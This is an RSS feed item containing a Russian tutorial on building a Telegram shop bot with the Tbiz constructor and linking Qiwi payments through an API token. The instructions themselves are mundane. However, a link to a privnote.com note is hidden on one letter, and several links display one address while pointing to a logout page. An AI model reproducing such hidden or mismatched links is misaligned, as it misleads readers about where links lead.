]]></content:encoded></item><item><guid isPermaLink="true">https://teletype.in/@projectprofit/JO8zFV2yW</guid><link>https://teletype.in/@projectprofit/JO8zFV2yW?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=projectprofit</link><comments>https://teletype.in/@projectprofit/JO8zFV2yW?utm_source=teletype&amp;utm_medium=feed_rss&amp;utm_campaign=projectprofit#comments</comments><dc:creator>projectprofit</dc:creator><title>Свой магазин в Телеграм</title><pubDate>Thu, 04 Feb 2021 14:34:24 GMT</pubDate><media:content medium="image" url="https://teletype.in/files/d3/4f/d34f2208-fef0-4c58-9b1b-2eef3e97d12c.png"></media:content><description><![CDATA[<img src="https://tgraph.io/file/cb373df0413743b7398b3.jpg"></img>Всем шалом. Настройка будет происходить через конструктор ботов, это немного ограничит функционал, но зато прибавит сил и свободного времени.]]></description><content:encoded><![CDATA[
  <p>Всем шалом. Настройка будет происходить через конструктор ботов, это немного ограничит функционал, но зато прибавит сил и свободного времени.</p>
  <h3>Приступим:</h3>
  <p>Для того, чтобы наш магазин работал 24/7 нам нужно создать бота.</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/cb373df0413743b7398b3.jpg" width="278" />
  </figure>
  <p>Пишем команду боту “/start” и ждем ответа от бота.</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/5cc9fd8cae49cfe2eef92.jpg" width="503" />
  </figure>
  <p>После того, как бот нам ответил, мы видим множество функций, нам нужно написать “/newbot”</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/2fe9f73f77afd555112e3.jpg" width="498" />
  </figure>
  <p>Теперь нам нужно придумать имя для бота. Я же назову его “OberShop”.</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/1aeebf35c962182d36b70.jpg" width="496" />
  </figure>
  <p>Дальше нам нужно придумать адрес бота, чтобы другие пользователи могли найти ваш магазин. Для примера выбрал адрес “testobershop_bot”. Обязательно после адреса указывайте “_bot”.</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/fe8b50d7c6196f8ca9741.jpg" width="496" />
  </figure>
  <p>Если вы сделали всё правильно, то у вас появится такое сообщение. Из этого сообщения нам нужно скопировать token бота. Что такое “Токен” ? Токен предназначен для электронного удостоверения личности.</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/e9ccabb311caa65750323.jpg" width="430" />
  </figure>
  <h3>Регистрация на сайте, для создания магазина</h3>
  <p>Основную работу мы выполнили, получив токен бота, теперь нам нужно зарегистрироваться на сайте. Мы будем использовать сайт “Tbiz”, он предоставляет 3 дня бесплатного использования магазина, дальше будет платно. За 3 дня можно понять нужен ли вам такой магазин или нет.</p>
  <p>Переходим на сайт “<a href="https://tbiz.pro/login" target="_blank">https://tbiz.pro/login</a>”</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/b5dfec3892abd6f6c0078.jpg" width="471" />
  </figure>
  <p>Вписываем все необходимые данные, и ставим все галочки. И нажимаем на кнопку “Зарегистрироваться”.</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/cbd7f6fd2f7c503ab9645.jpg" width="480" />
  </figure>
  <p>После того, как успешно зарегистрировались, нас перенаправляет в панель управления. В верхнем левом углу нажимаем кнопку “Создать Магазин”.</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/fbbf0e3715021df7e2cee.jpg" width="1280" />
  </figure>
  <p>У нас появилось окно “Новый магазин”. В строку вставляем Токен нашего бота.</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/57692b52d70b1c4630663.jpg" width="501" />
  </figure>
  <p>Если вы сделали всё правильно, то у вас появляется “Конструктор”. В верхнем левом углу, мы видим адрес нашего бота, если он у вас не высвечивается - это означает, что вы допустили ошибку и вас следует перепроверить токен.</p>
  <h3>Разбор функций сайта</h3>
  <p>Заказы -в этом разделе мы будем видеть, кто купил наш товар.</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/05cba6e40ad1ebc0706d4.jpg" width="1280" />
  </figure>
  <p>Товары - в этом разделе мы будем видеть, какие у нас есть товары.</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/1af6ecae911ca8350f1e5.jpg" width="1280" />
  </figure>
  <p>Пользователи - в этом разделе мы будем видеть, кто использует наш магазин.</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/40b6dc457fcb8d032c6e9.jpg" width="1280" />
  </figure>
  <p>Рассылки - Тут мы может выбрать пользователей нашего магазина и выполнить рассылку.</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/815ffb1ac1b9492019f2c.jpg" width="1280" />
  </figure>
  <p>Продвижение - в этом разделе у нас появится окно со способами продвижения.</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/bbab7932ba122ccde7704.jpg" width="496" />
  </figure>
  <p>Реф. программа - Здесь мы можем создать бонусы для покупателей</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/ce4670009e7db8229d747.jpg" width="493" />
  </figure>
  <p>Настройки магазина - Здесь мы может полностью настроить наш магазин.</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/e1427a1f45049ed2aa9c7.jpg" width="211" />
  </figure>
  <p>Настройка оплаты - в этом разделе мы будем указывать наши реквизиты</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/15abfd43584ba16da002c.jpg" width="496" />
  </figure>
  <h3>&quot;Мозги&quot; для магазина</h3>
  <p>Переходим в раздел “Конструтор” ( <a href="https://tbiz.pro/logout" target="_blank">https://tbiz.pro/settings/constructor</a> )</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/9f4c96028fc1388a3a35b.jpg" width="1280" />
  </figure>
  <p>В левом половине сайта, мы видим поле для “Приветствия”. Я указал краткое приветствие для покупател<a href="https://privnote.com/ttN4QwQG#Imnil05Hr" target="_blank">я</a></p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/6089e069035bd52677479.jpg" width="784" />
  </figure>
  <p>В правой половине сайта, мы видим поле с кнопками. Для того, чтобы добавить свою кнопку нужно нажать “Добавить кнопку”.</p>
  <p>У нас появляется окно для ввода данных для кнопки. Я написал краткую информацию.</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/6e9be3ddee81a2557db35.jpg" width="503" />
  </figure>
  <p>Переходим в раздел “Товары” ( <a href="https://tbiz.pro/logout" target="_blank">https://tbiz.pro/goods</a> ).</p>
  <p>В верхнем правом углу нажимаем “Добавить товар”.</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/45e9ff2f63d40c955faf5.jpg" width="1280" />
  </figure>
  <p>Тут указываем все необходимые данные и нажимаем “Добавить товар”.</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/a1828a3159e2fbce753a0.jpg" width="398" />
  </figure>
  <p>Видим, что всё успешно создалось, теперь загружаем материал. Материал у нас появится после оплаты товара</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/fa3729ed9d16f4693369d.jpg" width="1280" />
  </figure>
  <p>В появившемся окне указываем необходимые данные</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/7fb26d60cce5ecfc42e65.jpg" width="498" />
  </figure>
  <p>Переходим в раздел “Настройка оплаты” ( <a href="https://tbiz.pro/logout" target="_blank">https://tbiz.pro/settings/methods_pay</a> ).</p>
  <p>Видим, что нужен секретный ключ киви. Важно нам нужно только указать “Просмотр истории платежей”.</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/dda42daa16256b4bba397.jpg" width="496" />
  </figure>
  <p>Переходим по ссылке ( <a href="https://qiwi.com/api" target="_blank">https://qiwi.com/api</a> ).</p>
  <p>И нажимаем кнопку выпустить новый токен. Тут ставим галочку только “Просмотр истории платежей”.</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/d83198f48e469b9073f59.jpg" width="619" />
  </figure>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/c7fc767506944a14acaf7.jpg" width="621" />
  </figure>
  <p>Копируем наш токен в киви и вставляем его в поля “Настройка оплаты”. И сохраняем</p>
  <figure class="m_custom">
    <img src="https://tgraph.io/file/742b60476de294009c524.jpg" width="403" />
  </figure>

]]></content:encoded></item></channel></rss>